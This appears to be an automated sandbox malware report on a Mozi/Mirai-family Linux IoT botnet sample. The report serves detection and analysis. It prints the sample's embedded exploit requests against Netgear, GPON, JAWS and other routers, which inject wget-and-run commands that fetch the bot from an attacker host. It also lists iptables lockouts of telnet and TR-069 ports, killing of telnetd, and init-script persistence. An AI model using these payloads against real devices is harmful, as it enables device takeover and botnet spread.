              Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p udp --sport %d -j ACCEPT
              Source: Initial samplePotential command found: GET /c
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p tcp --destination-port %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p tcp --source-port %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p tcp --dport %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p tcp --sport %d -j ACCEPT
              Source: Initial samplePotential command found: killall -9 %s
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 22 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 23 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 2323 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 22 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 23 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 2323 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 22 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 23 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 2323 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 22 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 23 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 2323 -j DROP
              Source: Initial samplePotential command found: killall -9 telnetd utelnetd scfgmgr
              Source: Initial samplePotential command found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
              Source: Initial samplePotential command found: GET /Mozi.6 HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.7 HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.c HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.m HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.x HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.a HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.s HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.r HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.b HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.4 HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.k HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.l HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.p HTTP/1.0
              Source: Initial samplePotential command found: GET /%s HTTP/1.1
              Source: Initial samplePotential command found: POST /%s HTTP/1.1
              Source: Initial samplePotential command found: POST /GponForm/diag_Form?images/ HTTP/1.1
              Source: Initial samplePotential command found: POST /picsdesc.xml HTTP/1.1
              Source: Initial samplePotential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: Initial samplePotential command found: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
              Source: Initial samplePotential command found: POST /UD/act?1 HTTP/1.1
              Source: Initial samplePotential command found: POST /HNAP1/ HTTP/1.0
              Source: Initial samplePotential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
              Source: Initial samplePotential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
              Source: Initial samplePotential command found: POST /soap.cgi?service=WANIPConn1 HTTP/1.1
              Source: Initial samplePotential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
              Source: Initial samplePotential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
              Source: ELF static info symbol of initial sample.symtab present: no
              Source: mozi.a.zip, type: SAMPLEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
              Source: /usr/networks, type: DROPPEDMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
              Source: classification engineClassification label: mal100.spre.troj.evad.linZIP@0/221@4/0

              Persistence and Installation Behavior:

              Executes the "iptables" command to insert, remove and/or manipulate rules
              Source: /bin/sh (PID: 4638)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4670)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4674)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4718)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4737)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4747)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4772)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4793)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4813)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
              Source: /bin/sh (PID: 4816)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
              Source: /bin/sh (PID: 4825)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
              Source: /bin/sh (PID: 4847)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
              Source: /bin/sh (PID: 4895)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
              Source: /bin/sh (PID: 4918)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
              Source: /bin/sh (PID: 4945)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
              Source: /bin/sh (PID: 4966)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
              Source: /bin/sh (PID: 4985)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
              Source: /bin/sh (PID: 5004)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
              Source: /bin/sh (PID: 5022)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
              Source: /bin/sh (PID: 5042)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
              Source: /bin/sh (PID: 5060)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
              Source: /bin/sh (PID: 5079)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
              Source: /bin/sh (PID: 5097)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
              Source: /bin/sh (PID: 5118)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
              Source: /bin/sh (PID: 5219)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5222)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5226)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5242)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5265)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 8987 -j ACCEPT
              Source: /bin/sh (PID: 5288)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8987 -j ACCEPT
              Source: /bin/sh (PID: 5314)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8987 -j ACCEPT
              Source: /bin/sh (PID: 5338)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8987 -j ACCEPT
              Sample reads /proc/mounts (often used for finding a writable filesystem)
              Source: /tmp/mozi.a.zip (PID: 4598)File: /proc/4598/mounts
              Sample tries to persist itself using /etc/profile
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/profile.d/cedilla-portuguese.sh
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/profile.d/apps-bin-path.sh
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/profile.d/Z97-byobu.sh
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/profile.d/bash_completion.sh
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/profile.d/vte-2.91.sh
              Sample tries to persist itself using System V runlevels
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/rcS.d/S95baby.sh
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/rc.local
              Terminates several processes with shell command 'killall'
              Source: /bin/sh (PID: 4602)Killall command executed: killall -9 telnetd utelnetd scfgmgr
              Source: /tmp/mozi.a.zip (PID: 4600)Shell command executed: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
              Source: /tmp/mozi.a.zip (PID: 4634)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 60120 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 4668)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 60120 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 4671)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 60120 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 4711)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 60120 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 4732)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 60120 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 4741)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 60120 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 4764)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 60120 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 4789)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 60120 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 4811)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 4814)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 4818)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 4838)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 4865)Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
              Source: /tmp/mozi.a.zip (PID: 4875)Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
              Source: /tmp/mozi.a.zip (PID: 4887)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 4911)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 4938)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 4960)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 4978)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 4998)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 5015)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 5034)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 5053)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 5072)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 5087)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 5113)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 5217)Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --destination-port 8987 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 5220)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 8987 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 5223)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 8987 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 5233)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 8987 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 5255)Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --dport 8987 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 5282)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --sport 8987 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 5306)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 8987 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 5332)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 8987 -j ACCEPT"
              Source: /bin/sh (PID: 4638) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4670) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4674) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4718) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4737) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4747) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4772) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4793) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4813) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
              Source: /bin/sh (PID: 4816) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
              Source: /bin/sh (PID: 4825) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
              Source: /bin/sh (PID: 4847) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
              Source: /bin/sh (PID: 4895) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
              Source: /bin/sh (PID: 4918) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
              Source: /bin/sh (PID: 4945) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
              Source: /bin/sh (PID: 4966) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
              Source: /bin/sh (PID: 4985) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
              Source: /bin/sh (PID: 5004) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
              Source: /bin/sh (PID: 5022) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
              Source: /bin/sh (PID: 5042) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
              Source: /bin/sh (PID: 5060) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
              Source: /bin/sh (PID: 5079) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
              Source: /bin/sh (PID: 5097) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
              Source: /bin/sh (PID: 5118) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
              Source: /bin/sh (PID: 5219) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5222) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5226) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5242) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5265) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 8987 -j ACCEPT
              Source: /bin/sh (PID: 5288) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8987 -j ACCEPT
              Source: /bin/sh (PID: 5314) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8987 -j ACCEPT
              Source: /bin/sh (PID: 5338) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8987 -j ACCEPT
              Source: /tmp/mozi.a.zip (PID: 4625) Reads from proc file: /proc/stat
              Source: /tmp/mozi.a.zip (PID: 4598) File: /usr/networks (bits: - usr: rx grp: rx all: rwx)
              Source: /tmp/mozi.a.zip (PID: 4598) File: /etc/rcS.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)
              Source: /tmp/mozi.a.zip (PID: 4598) File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)
              Source: /tmp/mozi.a.zip (PID: 4598) File written: /usr/networks
              Source: /tmp/mozi.a.zip (PID: 4598) Shell script file created: /etc/rcS.d/S95baby.sh
              Source: /tmp/mozi.a.zip (PID: 4598) Shell script file created: /etc/init.d/S95baby.sh
              Source: submitted sample Stderr:
              telnetd: no process found
              utelnetd: no process found
              scfgmgr: no process found
              Unsupported ioctl: cmd=0xffffffff80045705
              Unsupported ioctl: cmd=0xffffffff80045705
              Unsupported ioctl: cmd=0xffffffff80045705
              /bin/sh: 1: cfgtool: not found
              /bin/sh: 1: cfgtool: not found
              qemu: uncaught target signal 11 (Segmentation fault) - core dumped
              Unsupported ioctl: cmd=0xffffffff80045705
              Unsupported ioctl: cmd=0xffffffff80045705: exit code = 0

              Hooking and other Techniques for Hiding and Protection:

              Drops files in suspicious directories
              Source: /tmp/mozi.a.zip (PID: 4598) File: /etc/init.d/S95baby.sh
              Source: /tmp/mozi.a.zip (PID: 4598) File: /etc/init.d/mountall.sh
              Source: /tmp/mozi.a.zip (PID: 4598) File: /etc/init.d/checkfs.sh
              Source: /tmp/mozi.a.zip (PID: 4598) File: /etc/init.d/umountnfs.sh
              Source: /tmp/mozi.a.zip (PID: 4598) File: /etc/init.d/mountkernfs.sh
              Source: /tmp/mozi.a.zip (PID: 4598) File: /etc/init.d/checkroot-bootclean.sh
              Source: /tmp/mozi.a.zip (PID: 4598) File: /etc/init.d/mountnfs-bootclean.sh
              Source: /tmp/mozi.a.zip (PID: 4598) File: /etc/init.d/bootmisc.sh
              Source: /tmp/mozi.a.zip (PID: 4598) File: /etc/init.d/checkroot.sh
              Source: /tmp/mozi.a.zip (PID: 4598) File: /etc/init.d/hwclock.sh
              Source: /tmp/mozi.a.zip (PID: 4598) File: /etc/init.d/hostname.sh
              Source: /tmp/mozi.a.zip (PID: 4598) File: /etc/init.d/mountdevsubfs.sh
              Source: /tmp/mozi.a.zip (PID: 4598) File: /etc/init.d/mountall-bootclean.sh
              Source: /tmp/mozi.a.zip (PID: 4598) File: /etc/init.d/mountnfs.sh
              Source: /tmp/mozi.a.zip (PID: 4598) File: /usr/bin/gettext.sh
              Source: /tmp/mozi.a.zip (PID: 4598) File: /usr/sbin/alsa-info.sh
              Uses known network protocols on non-standard ports
              Source: unknown Network traffic detected: HTTP traffic on port 56274 -> 52869
              Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 56274
              Source: unknown Network traffic detected: HTTP traffic on port 45556 -> 49152
              Source: unknown Network traffic detected: HTTP traffic on port 49152 -> 45556
              Source: unknown Network traffic detected: HTTP traffic on port 39288 -> 49152
              Source: unknown Network traffic detected: HTTP traffic on port 49152 -> 39288
              Source: /tmp/mozi.a.zip (PID: 4580) Queries kernel information via 'uname':
              Source: /tmp/mozi.a.zip (PID: 4598) Queries kernel information via 'uname':
              Source: /tmp/mozi.a.zip (PID: 4621) Queries kernel information via 'uname':
              Source: /sbin/modprobe (PID: 4652) Queries kernel information via 'uname':
              Source: /usr/share/apport/apport-gtk (PID: 5181) Queries kernel information via 'uname':
              Source: /usr/share/apport/apport-gtk (PID: 5208) Queries kernel information via 'uname':

              Mitre Att&ck Matrix

              Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
              Valid Accounts | Command and Scripting Interpreter 1 | .bash_profile and .bashrc 1 | .bash_profile and .bashrc 1 | Masquerading 1 | OS Credential Dumping 1 | Security Software Discovery 11 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Non-Standard Port 11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
              Default Accounts | Scripting 12 | At (Linux) 1 | At (Linux) 1 | File and Directory Permissions Modification 1 | Brute Force 1 | Remote System Discovery 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 4 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
              Domain Accounts | At (Linux) 1 | Logon Script (Windows) | Logon Script (Windows) | Scripting 12 | Security Account Manager | System Network Configuration Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 5 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
              Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | File and Directory Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 5 | SIM Card Swap | | Carrier Billing Fraud
              Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | System Information Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings

              Behavior Graph

              [Behavior graph. ID: 349551, Sample: mozi.a.zip, Startdate: 06/02/2021, Architecture: LINUX, Score: 100]

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              Source | Detection | Scanner | Label
              mozi.a.zip | 66% | Virustotal |
              mozi.a.zip | 54% | Metadefender |
              mozi.a.zip | 68% | ReversingLabs | Linux.Trojan.Mirai
              mozi.a.zip | 100% | Avira | LINUX/Mirai.lldau

              Dropped Files

              Source | Detection | Scanner | Label
              /usr/networks | 100% | Avira | LINUX/Mirai.lldau
              /usr/networks | 54% | Metadefender |
              /usr/networks | 68% | ReversingLabs | Linux.Trojan.Mirai

              Domains

              No Antivirus matches

              URLs


              Domains and IPs

              Contacted Domains

              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              dht.transmissionbt.com | 212.129.33.59 | true | false | | high
              bttracker.acc.umu.se | 130.239.18.159 | true | false | | high
              router.bittorrent.com | 67.215.246.10 | true | false | | high
              router.utorrent.com | 82.221.103.244 | true | false | | high
              bttracker.debian.org | unknown | unknown | false | | high

                        Contacted URLs


                        URLs from Memory and Binaries


                                              Contacted IPs



                                              General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 349551
Start date: 06.02.2021
Start time: 11:34:42
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 59s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: mozi.a.zip
Cookbook file name: defaultlinuxfilecookbook.jbs
Analysis system description: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Analysis Mode: default
Detection: MAL
Classification: mal100.spre.troj.evad.linZIP@0/221@4/0
Warnings:
                                              • Excluded IPs from analysis (whitelisted): 91.189.92.39, 91.189.92.41, 91.189.92.20, 91.189.92.19, 91.189.92.40, 91.189.92.38
                                              • TCP Packets have been reduced to 100
                                              • Created / dropped Files have been reduced to 100
                                              • Excluded domains from analysis (whitelisted): api.snapcraft.io
                                              • VT rate limit hit for: http://127.0.0.1:80/GponForm/diag_Form?images/


                                              Runtime Messages

Command: /tmp/mozi.a.zip
Exit Code: 0
Exit Code Info:
Killed: False
Standard Output:

Standard Error:
telnetd: no process found
utelnetd: no process found
scfgmgr: no process found
Unsupported ioctl: cmd=0xffffffff80045705
Unsupported ioctl: cmd=0xffffffff80045705
Unsupported ioctl: cmd=0xffffffff80045705
/bin/sh: 1: cfgtool: not found
/bin/sh: 1: cfgtool: not found
qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Unsupported ioctl: cmd=0xffffffff80045705
Unsupported ioctl: cmd=0xffffffff80045705

                                              Joe Sandbox View / Context

                                              IPs

                                              No context

                                              Domains


                                              ASN


                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              Match: /etc/init.d/S95baby.sh
                                              Associated Sample Name / URL (Detection: malicious for each): bin.sh, i, Mozi.m, Mozi.m, 1skm346Xtz, Mozi.a, Mozi.1.m, 6wuvHEBHt8.bin, 7v1ic5IS8I, Mozi.a, Mozi.a, Mozi.m, Mozi.m, Mozi.m, bad_file, mxjzQQFgLp, JrAL1wW1MQ

                                              Match: /etc/rcS.d/S95baby.sh
                                              Associated Sample Name / URL (Detection: malicious for each): bin.sh, i, Mozi.m, Mozi.m, 1skm346Xtz, Mozi.a, Mozi.1.m, 6wuvHEBHt8.bin, 7v1ic5IS8I, Mozi.a, Mozi.a, Mozi.m, Mozi.m, Mozi.m, bad_file, mxjzQQFgLp, JrAL1wW1MQ

                                                                                                                  Created / dropped Files

                                                                                                                  /boot/grub/i386-pc/modinfo.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
